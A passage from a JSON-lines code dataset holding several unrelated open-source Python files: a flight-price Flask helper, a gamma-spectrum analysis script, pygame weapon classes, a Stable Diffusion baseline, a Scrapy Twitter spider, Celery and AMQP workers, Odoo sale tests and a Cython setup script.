int(pd.to_datetime(Departure, format =\"%Y-%m-%dT%H:%M\").hour)\n x[4]= int(pd.to_datetime(Departure, format =\"%Y-%m-%dT%H:%M\").minute)\n\n x[5]= int(pd.to_datetime(Arrival, format =\"%Y-%m-%dT%H:%M\").hour)\n x[6]= int(pd.to_datetime(Arrival, format =\"%Y-%m-%dT%H:%M\").minute)\n\n x[7]= abs(x[3]-x[5])\n x[8]= abs(x[4]-x[6])\n\n\n if airline_index>=0:\n x[airline_index]=1\n if source_index>=0:\n x[source_index]=1\n if destination_index>=0:\n x[destination_index]=1\n\n \n return round(__model.predict([x])[0],2)\n\ndef load_saved_artifacts():\n global __data_columns\n global __airlines\n global __model\n global __sources\n global __destinations\n global __stop_details\n global data\n\n with open(\"./artifacts/artifacts.json\", 'r') as j:\n data= json.loads(j.read())\n __airlines = data['airlines']\n __sources= data['sources']\n __destinations= data['destinations']\n __data_columns= data['data_columns']\n __stop_details= data.get('stop_details')\n\n with open(\"./artifacts/flight_rf.pkl\",'rb') as f:\n __model = pickle.load(f)\n \n \n\n\n# if __name__ == '__main__':\n# load_saved_artifacts()\n# print()\n# print()\n# print(data)","repo_name":"tatanaidun/FlaskAPI_forPREVEL","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"39883212816","text":"#! /usr/bin/python3\n\nimport VisTools.plotting as vtp\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as tck\nimport pandas as pd\nfrom scipy.interpolate import spline\nimport numpy as np\nimport uncertainties as unc\nimport uncertainties.unumpy as unp\n\ncollected_data = pd.DataFrame()\n\nvalues = {\n \"co60\": {\n \"name\": \"$^{60}$Co\",\n \"marked_ch\": [76, 196, 708, 927, 1047],\n \"marked_ch_err\": [5, 10, 30, 20, 10, 10],\n \"energy_theo\": [1.17323, 1.33248],\n \"fitting_interval\": [[870, 990], [990, 1150]],\n \"timeframe\": 735\n },\n \"cs137\": {\n \"name\": \"$^{137}$Cs\",\n \"marked_ch\": [78, 171, 370, 543],\n \"marked_ch_err\": [5, 10, 15, 10],\n \"energy_theo\": [0.6616],\n \"fitting_interval\": [[480, 700]],\n \"timeframe\": 290\n },\n \"mn54\": {\n \"name\": \"$^{54}$Mn\",\n \"marked_ch\": [14, 75, 178, 497, 678],\n \"marked_ch_err\": [2, 5, 10, 15, 10],\n \"energy_theo\": [0.8353],\n \"fitting_interval\": [[600, 800]],\n \"timeframe\": 298\n },\n \"ba133\": {\n \"name\": \"$^{133}$Ba\",\n \"marked_ch\": [78, 102, 144, 257, 308],\n \"marked_ch_err\": [5, 10, 10, 10, 10],\n \"energy_theo\": [0.356],\n \"fitting_interval\": [[275, 400]],\n \"timeframe\": 282\n },\n \"na22\": {\n \"name\": \"$^{22}$Na\",\n \"marked_ch\": [76, 162, 420, 804, 1005],\n \"marked_ch_err\": [5, 20, 10, 15, 15, 20],\n \"energy_theo\": [1.2746],\n \"fitting_interval\": [[900, 1100]],\n \"timeframe\": 316\n }\n}\n\ndistr = lambda x, m, gamma, intens: intens*(gamma**2/((x-m)**2+gamma**2))\n\n###############################################################################\n# plotting for intensity\nfor f in values.keys():\n\n depth = len(values[f][\"fitting_interval\"])\n\n plt.cla()\n data = pd.read_table(\"data/\" + f + \"_int\", header=None, decimal=',').transpose()\n\n data.columns = [f + \"_int\"]\n\n # add read values into collected_data\n collected_data = pd.concat([collected_data, data], axis=1)\n\n values[f][\"peak_params\"] = []\n\n # calculating right xlimit\n for i, v in enumerate(reversed(data[f + \"_int\"][:2000])):\n if v > 100:\n values[f][\"xlim_r\"] = len(data[f + \"_int\"])-i-1\n #print(xlim2, v)\n break\n #plt.xlim([0, xlim2*1.1])\n\n # fitting the photopeaks\n for i, interv in enumerate(values[f][\"fitting_interval\"]):\n x_data = np.arange(interv[0],interv[1])\n\n p0 = [\n values[f][\"marked_ch\"][-depth+i],\n 70,\n data[f + \"_int\"][values[f][\"marked_ch\"][-depth+i]]\n ]\n\n fparams = vtp.fit(\n x_data,\n data[f + \"_int\"][interv[0]:interv[1]],\n distr,\n p0,\n [10]*len(x_data)\n )\n\n # extrapolation by eye (bc of energy_resolution fit)\n if f == \"co60\":\n if i == 1:\n fparams[1]*=.87\n if i == 0:\n fparams[1]*=.79\n\n ## replace the old estimations with the fitted peak positions\n values[f][\"marked_ch\"][-depth+i] = fparams[0].n\n values[f][\"marked_ch_err\"][-depth+i] += fparams[0].s\n values[f][\"marked_ch_err\"][-depth+i] = values[f][\"marked_ch_err\"][-depth+i]/2\n\n\n values[f][\"peak_params\"].append([*fparams])\n #print(*unp.nominal_values([*fparams]))\n\n# add underground to dataset\ndata = pd.read_table(\"data/\" + f + \"_int\", header=None, decimal=',').transpose()\ndata.columns = [\"underground_int\"]\n\n# add read values into collected_data\ncollected_data = pd.concat([collected_data, data], axis=1)\n\n# fitting the calibration\nlist_en = []\nlist_ch = []\nfor e in values.keys():\n for i, v in enumerate(values[e][\"energy_theo\"]):\n depth = len(values[e][\"energy_theo\"])\n\n list_en.append(v)\n list_ch.append(values[e][\"marked_ch\"][-depth+i])\n\n\nfit_en_m, fit_en_c = vtp.fit_linear(\n list_ch,\n list_en,\n [\n 1/1000,\n 0\n ],\n None\n)\n\n\n###############################################################################\n# calibration plot\n## figure setup\nfig = plt.figure(figsize=(11.7,8.3))\nplt.style.use('bmh')\nplt.minorticks_on()\nplt.grid(b=True, which=\"minor\", color=\"#cccccc\")\n\n## plotting the fitted linear curve\ncalib_xdata = np.array([200, 1100])\nplt.plot(\n calib_xdata,\n calib_xdata*fit_en_m.n+fit_en_c.n,\n label=\"linear fit\",\n color=\"#c0c0c0\"\n)\n\n## plotting the used points\nfor e in values.keys():\n for i, v in enumerate(values[e][\"energy_theo\"]):\n depth = len(values[e][\"energy_theo\"])\n plt.errorbar(\n values[e][\"marked_ch\"][-depth +i],\n v,\n xerr=values[e][\"marked_ch_err\"][-depth+i],\n label=(values[e][\"name\"] + \" \" + str(i+1)) if e == \"co60\" else values[e][\"name\"],\n zorder=2,\n elinewidth=1,\n fmt=\".\",\n ms=4\n )\n\n## add the curve parameters to plot\nplt.annotate(\n \"Energy = Channel $\\cdot$ m + c\\n\\nm = $({:.3fL})$ keV\\nc = $({:.3fL})$ keV\"\n .format(fit_en_m*1000, fit_en_c*1000),\n xy=(800, 0.6),\n xycoords='data',\n xytext=(0, 0),\n textcoords='offset points',\n fontsize=14,\n bbox=dict(\n boxstyle=\"round\",\n fc=\"1\"\n )\n)\n\n## plot meta\nplt.legend()\nplt.xlabel(\"channel\")\nplt.ylabel(\"Energy / MeV\")\nplt.title(\"Calibration Fit, Channel vs. Energy\")\nplt.savefig(\"energy_calibration.png\")\n\n\n###############################################################################\n# underground plot\n\nplt.clf()\nplt.plot(\n np.array(collected_data.index.values.tolist()) * fit_en_m.n + fit_en_c.n,\n collected_data[\"underground_int\"]\n)\n\nplt.xlim([0,1.5])\nplt.ylim([-100,2500])\nplt.xlabel(\"Energy / MeV\")\nplt.ylabel(\"Intensity\")\nplt.savefig(\"int_underground.png\")\n\n\n###############################################################################\n# plot Energyresolution\nplt.cla()\nlims = [.2, 1.5]\nfitlims = [.3, 1.5]\n\nplt.xlim(lims)\n\nfitpointsx = np.array([])\nfitpointsy = np.array([])\n\nfor e in values.keys():\n for i, v in enumerate(values[e]['energy_theo']):\n depth = len(values[e][\"energy_theo\"])\n plt.errorbar(\n (values[e][\"marked_ch\"][-depth +i]*fit_en_m+fit_en_c).n,\n (values[e][\"peak_params\"][i][1]*2*fit_en_m).n,\n xerr=(values[e][\"marked_ch\"][-depth +i]*fit_en_m+fit_en_c).s,\n yerr=(values[e][\"peak_params\"][i][1]*2*fit_en_m).s,\n label= (values[e][\"name\"] + \" \" + str(i+1)) if e == \"co60\" else values[e][\"name\"],\n zorder=2,\n elinewidth=1,\n fmt=\".\",\n ms=4\n )\n\n fitpointsx = np.append(fitpointsx,np.array([values[e][\"marked_ch\"][-depth +i]*fit_en_m.n+fit_en_c.n]))\n fitpointsy = np.append(fitpointsy,np.array([values[e][\"peak_params\"][i][1].n*2*fit_en_m.n]))\n #print(e, i, -depth+i, values[e][\"peak_params\"][-depth +i][1].n)\n\nef = lambda x, intensity, w, c: c + np.exp(x/w) * intensity\n\nfparams = vtp.fit(\n fitpointsx,\n fitpointsy,\n ef,\n [\n 1,\n 1,\n 0\n ],\n None\n)\n\nfx_data = np.arange(*fitlims, .1)\n\nplt.plot(\n fx_data,\n ef(fx_data, *unp.nominal_values(fparams)),\n label=\"exp. Fit: $I\\cdot e^{E/w} + c$\",\n color=\"gray\"\n)\n\n## add the curve parameters to plot\n\nplt.annotate(\n \"$c = ({c:.3fL})$ keV\\n$I = ({I:.3fL})$ keV\\n$w = ({w:.3fL})$ keV\".format(\n c=fparams[2]*1000,\n I=fparams[0]*1000,\n w=fparams[1]*1000\n ),\n xy=(.9, 0.05),\n xycoords='data',\n xytext=(0, 0),\n textcoords='offset points',\n fontsize=14,\n bbox=dict(\n boxstyle=\"round\",\n fc=\"1\"\n )\n)\n\n\nplt.xlabel('Energy / MeV')\nplt.ylabel('$\\Delta$ Energy / MeV')\nplt.legend()\nplt.savefig(\"energy_resolution.png\")\n\n\n\nplt.cla()\nax1 = fig.add_subplot(111)\nax2 = ax1.twiny()\n\n###############################################################################\n# plot intensity with Energy\nfor e in values.keys():\n ax1.cla()\n\n # plot intensity measurements\n ax1.plot(\n collected_data[e + \"_int\"] -\n collected_data[\"underground_int\"] /\n 71304 * values[e][\"timeframe\"],\n collected_data.index.values,\n color=\"gray\"\n )\n\n ymax = collected_data[e + \"_int\"][20:].max()*1.1\n\n for i, pos in enumerate(values[e][\"marked_ch\"]):\n if e == \"ba133\":\n offset = 5000\n else:\n offset = 0\n ann_ypos = np.linspace( ymax*.01+offset, ymax/4+offset, 5)\n ax1.vlines(\n pos,\n 0,\n ymax,\n linestyles='dotted',\n colors='gray'\n )\n\n ax1.annotate(\n \"ch = {:.0f}\\nE = ${:.3fL}$ MeV\".format(\n pos,\n pos * fit_en_m+fit_en_c\n ),\n xy=(pos, ann_ypos[i]),\n xycoords='data',\n xytext=(0, 0),\n textcoords='offset points',\n fontsize=10,\n bbox=dict(\n boxstyle=\"round\",\n fc=\"1\"\n )\n )\n\n for i, interv in enumerate(values[e][\"fitting_interval\"]):\n fit_xdata = np.arange(interv[0], interv[1])\n\n\n ax1.plot(\n fit_xdata,\n distr(\n fit_xdata,\n values[e][\"peak_params\"][i][0].n,\n values[e][\"peak_params\"][i][1].n,\n values[e][\"peak_params\"][i][2].n\n )# + offset\n )\n\n ylimits = np.array([0, ymax])\n\n # dummy plot\n #ax2.plot(np.arange(0, 1, .1), np.ones(10))\n ax2.set_xlim([fit_en_c.n, values[e][\"xlim_r\"] * fit_en_m.n + fit_en_c.n])\n\n ax2color = \"#00cc00\"\n\n ax2.grid(b=True, which=\"major\", color=ax2color)\n ax2.spines['top'].set_color(ax2color)\n ax2.tick_params(axis='x', colors=ax2color)\n\n ax2.set_xlabel(\"Energy / MeV\")\n\n # plot meta\n ax1.set_xlim([20, values[e][\"xlim_r\"]])\n ax1.set_ylim(ylimits)\n\n ax1.set_xlabel(\"Channel\")\n ax1.set_ylabel(\"Counts\")\n ax1.legend()\n\n elm = e[:2].capitalize()\n nc = e[2:]\n plt.title(\"Intensityspectrum of $^{{{}}}${}\".format(nc, elm), y=1.08)\n\n plt.savefig(\"int_\" + e + \".png\")\n plt.cla()\n\n###############################################################################\n# plot coincidence spectra\n\ncoinc_list = {\n \"co60\": {\n \"filename\": \"co60_koinz\",\n \"fitting_interval\": [[1.2, 1.325], [1.36, 1.49]],\n \"name\": \"$^{60}$Co\"\n },\n \"cs137_uncal\":{\n \"filename\": \"cs137_koinz_02\",\n \"fitting_interval\": [[0.68, 0.8]],\n \"name\": \"$^{137}$Cs uncalibrated\"\n },\n \"cs137_cal\": {\n \"filename\": \"cs137_koinz_03\",\n \"fitting_interval\": [[0.68, 0.8]],\n \"name\": \"$^{137}$Cs calibrated\"\n }\n}\n\nfor e in coinc_list.keys():\n data = pd.read_table(\n \"data/\" + coinc_list[e][\"filename\"],\n header=None, decimal=','\n ).transpose()\n data.columns = [e]\n xdata = np.array(data.index.values.tolist())*fit_en_m.n\n\n plt.clf()\n\n plt.plot(\n xdata,\n data[e],\n label = \"measurement of {}\".format(coinc_list[e][\"name\"])\n )\n\n # fit lorentzian(x, m, hwhm, int)\n for i, interv in enumerate(coinc_list[e][\"fitting_interval\"]):\n fitfilter = np.logical_and(xdata > interv[0], xdata < interv[1])\n\n p0 = [\n np.mean(interv),\n .05,\n 20\n ]\n\n\n #print(np.logical_and(xdata > interv[0], xdata < interv[1]))\n fparams = vtp.fit(\n xdata[fitfilter],\n data[e][fitfilter],\n distr,\n p0,\n None\n )\n print(fparams)\n\n plt.plot(\n xdata[fitfilter],\n distr(xdata[fitfilter], *(unp.nominal_values(fparams))),\n label= \"lorentzian fit\" +\n (\" no. {}\".format(i+1) if e == \"co60\" else \"\")\n )\n\n # plt.errorbar(\n # xdata[np.logical_not(fitfilter)],\n # distr(\n # xdata[np.logical_not(fitfilter)],\n # *(unp.nominal_values(fparams))\n # ),\n # fmt = \".\",\n # markersize=1\n # )\n\n\n #plt.hlines()\n\n\n ilist = data[data[e] > 5].index.tolist()\n print([min(ilist)*.9, max(ilist)*1.1])\n plt.xlim(np.array([min(ilist)*.9, max(ilist)*1.1])*fit_en_m.n)\n\n plt.xlabel(\"Energy / MeV\")\n plt.ylabel(\"Intensity\")\n plt.legend()\n plt.savefig(\"coinc_\" + e + \".png\")\n","repo_name":"acereca/FP","sub_path":"F83 - Koinzidenzspektrometer/spektra.py","file_name":"spektra.py","file_ext":"py","file_size_in_byte":12638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25334993420","text":"import random\nimport pygame\nimport colors\n\nclass Weapon:\n def __init__(self, constants):\n self.constants = constants\n self.charge = constants.MAX_WEAPON_CHARGE\n\n def draw(self, player, screen):\n beam_length_ns = self.BEAM_LENGTH*self.constants.CELL_HEIGHT\n beam_length_ew = self.BEAM_LENGTH*self.constants.CELL_WIDTH\n\n for i in range(self.NUMBER_OF_BOLTS):\n # start from center of cell\n start_point = (\n self.constants.CELL_WIDTH*player.x + self.constants.CELL_WIDTH//2,\n self.constants.CELL_HEIGHT*player.y + self.constants.CELL_HEIGHT//2)\n\n for j in range(self.BEAM_SEGMENTS):\n if player.facing == 0: # north\n end_point = (random.randint(start_point[0] - self.BEAM_WIDTH_STEP,\n start_point[0] + self.BEAM_WIDTH_STEP),\n start_point[1] - beam_length_ns//self.BEAM_SEGMENTS)\n elif player.facing == 1: # east\n end_point = (start_point[0] + beam_length_ew//self.BEAM_SEGMENTS,\n random.randint(start_point[1] - self.BEAM_WIDTH_STEP,\n start_point[1] + self.BEAM_WIDTH_STEP))\n elif player.facing == 2: # south\n end_point = (random.randint(start_point[0] - self.BEAM_WIDTH_STEP,\n start_point[0] + self.BEAM_WIDTH_STEP),\n start_point[1] + beam_length_ns//self.BEAM_SEGMENTS)\n else: # west\n end_point = (start_point[0] - beam_length_ew//self.BEAM_SEGMENTS,\n random.randint(start_point[1] - self.BEAM_WIDTH_STEP,\n start_point[1] + self.BEAM_WIDTH_STEP))\n\n pygame.draw.line(screen, colors.SOLID_CYAN, start_point, end_point,\n self.BEAM_WIDTH)\n start_point = end_point\n\n\nclass MiniBlaster(Weapon):\n def __init__(self, constants):\n super(MiniBlaster, self).__init__(constants)\n\n self.COST = 25\n self.NAME = 'Mini Blaster'\n self.DESCRIPTION = 'A weapon of underawing power.'\n self.BEAM_LENGTH = 1;\n self.BEAM_WIDTH_STEP = 5\n self.BEAM_SEGMENTS = 5\n self.BEAM_WIDTH = 1\n self.NUMBER_OF_BOLTS = 1\n self.DAMAGE = 4\n\nclass SuperMegaCannon(Weapon):\n def __init__(self, constants):\n super(SuperMegaCannon, self).__init__(constants)\n\n self.COST = 12500\n self.NAME = 'Super Mega Cannon'\n self.DESCRIPTION = 'A weapon of awesome power.'\n self.BEAM_LENGTH = 12;\n self.BEAM_WIDTH_STEP = 50\n self.BEAM_SEGMENTS = 10\n self.BEAM_WIDTH = 5\n self.NUMBER_OF_BOLTS = 5\n self.DAMAGE = 18\n\nclass MultiBlaster(Weapon):\n def __init__(self, constants):\n super(MultiBlaster, self).__init__(constants)\n\n self.COST = 0 # need to change if it can ever be bought\n self.NAME = 'Multi Blaster'\n self.DESCRIPTION = 'This wepon shoots two beams at once, making the scare time on monsters longer.'\n self.BEAM_LENGTH = 1;\n self.BEAM_WIDTH_STEP = 10\n self.BEAM_SEGMENTS = 5\n self.BEAM_WIDTH = 2\n self.NUMBER_OF_BOLTS = 2\n self.DAMAGE = 8\n\ndef list_weapons(constants):\n # returns a tuple with an instance of each weapon type\n return ( MiniBlaster(constants), SuperMegaCannon(constants), MultiBlaster(constants) )\n\n#\n# TESTS\n#\n\ndef test_list_weapons(constants):\n # makes sure that every weapon has expected constants\n for weapon in list_weapons(constants):\n assert weapon.BEAM_LENGTH > 0, 'missing BEAM_LENGTH'\n assert weapon.BEAM_WIDTH_STEP > 0, 'missing BEAM_WIDTH_STEP'\n assert weapon.BEAM_SEGMENTS > 0, 'missing BEAM_SEGMENTS'\n assert weapon.BEAM_WIDTH > 0, 'missing BEAM_WIDTH'\n assert weapon.NUMBER_OF_BOLTS > 0, 'missing NUMBER_OF_BOLTS'\n assert weapon.charge > 0, 'missing charge'\n\ndef run_tests(constants):\n test_list_weapons(constants)\n","repo_name":"joelodom/bernard","sub_path":"weapons.py","file_name":"weapons.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"34103901151","text":"\"\"\"Defines the baseline Stable Diffusion image-to-image model\"\"\"\nimport torch\nimport torch.nn as nn\nimport diffusers\nfrom util import device\nimport util\nfrom noisy_dataset import NoisyDataset\n\n\nclass ImageToImageBaseline(nn.Module):\n def __init__(self, sd_pipeline: diffusers.StableDiffusionImg2ImgPipeline, strength: float, nsteps: int = 50,\n prompt=None, negative_prompt=None, cfg: float = 0):\n super().__init__()\n self.sd = sd_pipeline\n self.strength = strength\n self.nsteps = nsteps\n\n if prompt is not None or negative_prompt is not None:\n assert cfg > 0\n else:\n assert cfg == 0 # this leads to unconditional sampling\n self.cfg = cfg\n self.prompt = prompt if prompt is not None else \"\"\n self.negative_prompt = negative_prompt\n\n def forward(self, xs, **kwargs):\n # xs : B x C x H x W\n (out, ), _ = self.sd(\n prompt=self.prompt,\n image=xs,\n strength=self.strength,\n num_inference_steps=self.nsteps,\n guidance_scale=self.cfg,\n negative_prompt=self.negative_prompt,\n return_dict=False,\n output_type=\"pt\", # return a Tensor\n **kwargs\n )\n # Given batch size 1, the pipeline automatically removes this dimension\n if len(out.shape) == 3:\n return out.unsqueeze(0)\n return out\n\n\nif __name__ == \"__main__\":\n parser = util.get_parser()\n args = parser.parse_args()\n prompt = \" \".join(args.prompt) if args.prompt is not None else None\n nprompt = \" \".join(args.nprompt) if args.nprompt is not None else None\n\n print(f\"Running with strength={args.strength}, cfg={args.cfg}, prompt={prompt}, nprompt={nprompt}\")\n\n transform = util.eval_transform(size=512)\n test_ds = NoisyDataset(root_path=args.directory, split=\"test\", transform=transform)\n\n sd = diffusers.StableDiffusionImg2ImgPipeline.from_pretrained(\n args.model,\n torch_dtype=torch.float16,\n safety_checker=None,\n ).to(device)\n # sd.enable_freeu(s1=0.9, s2=0.2, b1=1.2, b2=1.4)\n sd.set_progress_bar_config(disable=True)\n assert sd.safety_checker is None\n model = ImageToImageBaseline(sd,\n strength=args.strength,\n prompt=prompt,\n negative_prompt=nprompt,\n cfg=args.cfg,\n nsteps=args.nsteps).to(device)\n\n out_dir = f\"out/baseline_s={args.strength}_cfg={args.cfg}\"\n util.inference_on_dataset(model, test_ds, out_dir, batch_size=1)\n\n\n","repo_name":"VikaasVarma/GenerativeGaussianSplooging","sub_path":"baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"4420329410","text":"from flask import Flask, render_template, json\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route('/api')\ndef api():\n my_dict = {\"user\": {\"name\": \"Lucas\", \"age\": \"28\"}}\n return json.dumps(my_dict)\n\n\nif __name__ == \"__main__\":\n print(\"Server is running on localhost\")\n app.run(debug=True)\n","repo_name":"IndianTinker/Nuxt-Flask-Boilerplate","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"8033136594","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport tweepy\nimport scrapy_twitter\nfrom radyolo.items import StreamItem\n\n\nclass StreamSpider(scrapy.Spider):\n name = 'stream-spider'\n allowed_domains = ['twitter.com']\n\n def __init__(self, track=None, *args, **kwargs):\n if not track:\n raise scrapy.exceptions.CloseSpider('Argument track not set.')\n super(StreamSpider, self).__init__(*args, **kwargs)\n self.track = track.split(',')\n\n def start_requests(self):\n return [scrapy_twitter.TwitterStreamFilterRequest(track=self.track)]\n\n def parse(self, response):\n tweets = response.tweets\n\n for tweet in tweets:\n tweet_item = scrapy_twitter.to_item(tweet)\n yield StreamItem(\n username=tweet_item['user']['screen_name'],\n text=tweet_item['text'],\n timestamp=tweet_item['timestamp_ms'])\n\n","repo_name":"serkansokmen/radyolo-scraper","sub_path":"radyolo/spiders/stream_spider.py","file_name":"stream_spider.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40760101613","text":"from json import loads as json_loads\r\nfrom os import environ\r\n\r\nfrom celery import Celery\r\n\r\nfrom base import Session\r\nfrom weather import Weather\r\n\r\nhost = environ['REDIS_HOST']\r\nport = environ['REDIS_PORT']\r\n\r\napp = Celery('tasks', broker='redis://' + host + ':' + port + '/0')\r\n\r\n\r\n@app.task(name='save_data')\r\ndef save(data):\r\n d = json_loads(data)\r\n session = Session()\r\n\r\n time_equals = Weather.dt == d[\"dt\"]\r\n city_equals = Weather.city == d[\"city\"]\r\n\r\n # check if data is in the DB\r\n q = session.query(Weather).filter(time_equals).filter(city_equals).count()\r\n print(q)\r\n\r\n # if data is not in db, save it\r\n if q <= 0:\r\n w = Weather(\r\n d['temp'],\r\n d['temp_min'],\r\n d['temp_max'],\r\n d['dt'],\r\n d['humidity'],\r\n d['city']\r\n )\r\n session.add(w)\r\n session.commit()\r\n session.close()\r\n print(str(data) + 'is saved')\r\n else:\r\n print('not saved')\r\n return\r\n","repo_name":"gostrider/weather-fetching-re","sub_path":"collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71022048684","text":"from setuptools import Extension\nfrom distutils.core import setup\nfrom setuptools.command.test import test as TestCommand\nfrom Cython.Distutils import build_ext\nfrom Cython.Build import cythonize\nimport sys\n\n# cython = Extension('ea.cbenchmarks',\n# sources = ['ea/cbenchmarks.pyx'],\n# include_dirs = ['include/']\n# )\nsourcefiles = ['cec2013lsgo/cec2013.pyx']\n\nsourcefiles += ['cec2013lsgo/eval_func.cpp', 'cec2013lsgo/Benchmarks.cpp']\n\nfor i in range(1, 16):\n sourcefiles += ['cec2013lsgo/F%d.cpp' % i]\n\ncec2013lsgo = Extension(\"cec2013lsgo.cec2013\",\n sourcefiles,\n language=\"c++\",\n extra_compile_args=[\"-std=c++11\"],\n libraries=[\"m\"]) # Unix-like specific\n\n\nclass PyTest(TestCommand):\n user_options = [('pytest-args=', 'a', \"Arguments to pass to py.test\")]\n\n def initialize_options(self): \n TestCommand.initialize_options(self)\n self.pytest_args = []\n\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n\n def run_tests(self):\n #import here, cause outside the eggs aren't loaded\n import pytest\n\n errno = pytest.main(self.pytest_args)\n sys.exit(errno)\n\n\nsetup(\n name='cec2013lsgo',\n version='2.0',\n author='Daniel Molina',\n author_email='dmolina@decsai.ugr.es',\n maintainer='Daniel Molina',\n description='Package for benchmark for the Real \\\n Large Scale Global Optimization session on IEEE \\\n Congress on Evolutionary Computation CEC\\'2013',\n long_description=open('README.rst').read(),\n license='GPL V3',\n url='https://github.com/dmolina/cec2013lsgo',\n packages=['cec2013lsgo'],\n install_requires=['cython', 'numpy'],\n ext_modules=cythonize(cec2013lsgo),\n package_data={'cec2013lsgo': ['cdatafiles/*.txt']},\n tests_require=['pytest'],\n cmdclass={'build_ext': build_ext, 'test': PyTest},\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)',\n ]\n)\n","repo_name":"dmolina/cec2013lsgo","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"19"} +{"seq_id":"28871312981","text":"from odoo.tests.common import TransactionCase\n\n\nclass TestSale(TransactionCase):\n\n def setUp(self):\n super().setUp()\n company, unit, area, user = self.create_company('1')\n self.company_1 = company\n self.unit_1 = unit\n self.area_1 = area\n self.user_1 = user\n company, unit, area, user = self.create_company('2')\n self.company_2 = company\n self.unit_2 = unit\n self.area_2 = area\n self.customer = self.env['res.partner'].create({\n 'company_id': False,\n 'company_type': 'company',\n 'customer': True,\n 'supplier': False,\n 'name': 'Client',\n })\n\n def create_company(self, key):\n company = self.env['res.company'].create({\n 'name': 'Company %s' % key,\n })\n old_company = self.env.user.company_id\n self.env.user.company_id = company.id\n coas = self.env['account.chart.template'].search([])\n coas.try_loading_for_current_company()\n self.env.user.company_id = old_company.id\n user = self.env['res.users'].create({\n 'name': 'User %s' % key,\n 'login': 'user_%s@test.com' % key,\n 'company_ids': [(6, 0, [company.id])],\n 'company_id': company.id,\n })\n unit = self.env['product.business.unit'].create({\n 'name': 'Business unit %s' % key,\n 'company_id': company.id,\n })\n area = self.env['product.business.area'].create({\n 'name': 'Unit %s' % key,\n 'unit_id': unit.id,\n })\n return company, unit, area, user\n\n def create_product(self, unit, area, list_price=33.33):\n return self.env['product.product'].create({\n 'type': 'service',\n 'company_id': False,\n 'unit_id': unit.id,\n 'area_id': area.id,\n 'name': 'Service product',\n 'standard_price': round(list_price / 2),\n 'list_price': list_price,\n })\n\n def test_sale(self):\n product = self.create_product(self.unit_1, self.area_1, 33.33)\n sale = self.env['sale.order'].create({\n 'partner_id': self.customer.id,\n 'order_line': [\n (0, 0, {\n 'product_id': product.id,\n 'price_unit': 33.33,\n 'product_uom_qty': 1}),\n ]\n })\n self.assertTrue(sale.name)\n self.assertEquals(len(sale.order_line), 1)\n self.assertEquals(sale.state, 'draft')\n sale.action_confirm()\n self.assertEquals(sale.state, 'sale')\n self.assertEquals(sale.invoice_count, 0)\n sale.action_invoice_create()\n self.assertEquals(sale.invoice_count, 1)\n self.assertEquals(\n sale.invoice_ids[0].company_id, self.unit_1.company_id)\n\n def test_sale_two_invoices(self):\n product_1 = self.create_product(self.unit_1, self.area_1, 33.33)\n product_2 = self.create_product(self.unit_2, self.area_2, 33.33)\n sale = self.env['sale.order'].create({\n 'partner_id': self.customer.id,\n 'order_line': [\n (0, 0, {\n 'product_id': product_1.id,\n 'price_unit': 33.33,\n 'product_uom_qty': 1}),\n (0, 0, {\n 'product_id': product_2.id,\n 'price_unit': 33.33,\n 'product_uom_qty': 1}),\n ]\n })\n sale.action_confirm()\n sale.action_invoice_create()\n self.assertEquals(sale.invoice_count, 2)\n for inv in sale.invoice_ids:\n company = inv.mapped(\n 'invoice_line_ids.product_id.unit_id.company_id')\n self.assertEquals(inv.company_id, company)\n","repo_name":"pranav-1into2/Minsk","sub_path":"trey-addons/account_intercompany/tests/test_sale.py","file_name":"test_sale.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"23876276271","text":"from typing import Mapping, Any\nfrom dataclasses import dataclass\n\nfrom start import app\nfrom server.amqp import AMQPConsumer\nfrom patterns.service import IService\nfrom services.user_exclusion_service import (\n UserExclusionService,\n UserExclusionServiceProps,\n)\n\n\n@dataclass\nclass UserExclusionConsumerPayload:\n user_uuid: str\n\n\n@app.amqp.add_consumer(\n \"user_folder_exclusion_consumer\",\n \"queue_user_folder_exclusion\",\n ack=True,\n data_class=UserExclusionConsumerPayload,\n)\nclass UserExclusionConsumer(AMQPConsumer):\n def on_message_queue(\n self, body: UserExclusionConsumerPayload, **kwargs: Mapping[str, Any]\n ) -> None:\n user_exclusion_props: UserExclusionServiceProps = UserExclusionServiceProps(\n body.user_uuid\n )\n\n user_exclusion_service: IService[\n UserExclusionServiceProps, None\n ] = UserExclusionService()\n\n user_exclusion_service.execute(user_exclusion_props)\n","repo_name":"VictorHenrich/application-amqp","sub_path":"src/consumers/user_exclusion_consumer.py","file_name":"user_exclusion_consumer.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41425408552","text":"import src.colors as colors\nimport os\n\n# Dimensions\nPINOUT_ZONE_SIZE = 46\nPINOUT_COLUMN_LENGTH = 23\n\nMARGIN_SHOW = 10\nONE_COLUMN_FORMAT = 